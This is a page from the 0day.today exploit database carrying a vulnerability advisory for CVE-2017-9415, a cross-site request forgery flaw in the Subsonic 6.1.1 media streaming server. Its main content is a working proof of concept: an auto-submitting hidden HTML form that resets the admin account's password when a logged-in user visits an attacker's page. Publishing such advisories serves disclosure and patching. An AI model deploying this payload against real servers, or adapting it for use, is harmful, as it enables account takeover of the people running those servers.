[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Subsonic 6.1.1 - Cross-Site Request Forgery Vulnerability

Author
hyp3rlinx
Risk
[
Security Risk Low
]
0day-ID
0day-ID-27890
Category
web applications
Date add
05-06-2017
CVE
CVE-2017-9415
Platform
windows
[+] Credits: John Page a.k.a hyp3rlinx  
 
 
Vendor:
================
www.subsonic.org
 
 
 Product:
===============
subsonic v6.1.1
 
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
 
 
 
Vulnerability Type:
=====================
CSRF - Password Reset
 
 
 
CVE Reference:
==============
CVE-2017-9415
 
 
 
Security Issue:
================
Remote attackers can reset subsonic user account passwords if an authenticated user clicks a malicious link
or visits an attacker controlled webpage. However, username must be known or guessed.
 
 
 
 
Exploit/POC:
=============
<form  action="http://localhost:4040/userSettings.view" method="POST">
<input type="hidden" name="username"  value="admin">
<input type="hidden" name="transcodeSchemeName" value="OFF">
<input name="passwordChange" type="hidden" value="true"/>
<input type="hidden" name="_passwordChange" value="on"/>
<input  name="password" type="hidden" value="xyz123"/>
<input  name="confirmPassword" type="hidden" value="xyz123"/>
<input  name="email" type="hidden" value=""/>
<script>document.forms[0].submit()</script>
</form>

#  0day.today [2024-12-24]  #